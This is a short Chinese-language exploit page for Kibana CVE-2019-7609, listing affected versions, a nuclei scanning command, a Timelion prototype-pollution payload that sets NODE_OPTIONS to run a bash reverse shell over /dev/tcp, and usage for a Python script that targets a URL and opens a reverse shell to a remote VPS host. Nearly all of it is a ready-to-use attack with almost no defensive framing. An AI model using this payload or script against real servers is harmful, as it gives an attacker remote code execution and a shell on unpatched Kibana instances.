POC Kibana\CVE-2019-7609

## 影响范围

```http
kibana = 5.6.15
kibana <= 6.6.0
```

## POC

```bash
nuceli -tags kibana -t cves/ -l urls.txt
```

## EXP

```javascript
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```

脚本

```bash
 python CVE-2019-7609.py -u http://xxx.com -host vps-ip -port vps-port --shell

optional arguments:
  -h, --help         show this help message and exit
  -u URL             such as: http://127.0.0.1:5601
  -host REMOTE_HOST  reverse shell remote host: such as: 1.1.1.1
  -port REMOTE_PORT  reverse shell remote port: such as: 8888
  --shell            reverse shell after verify
```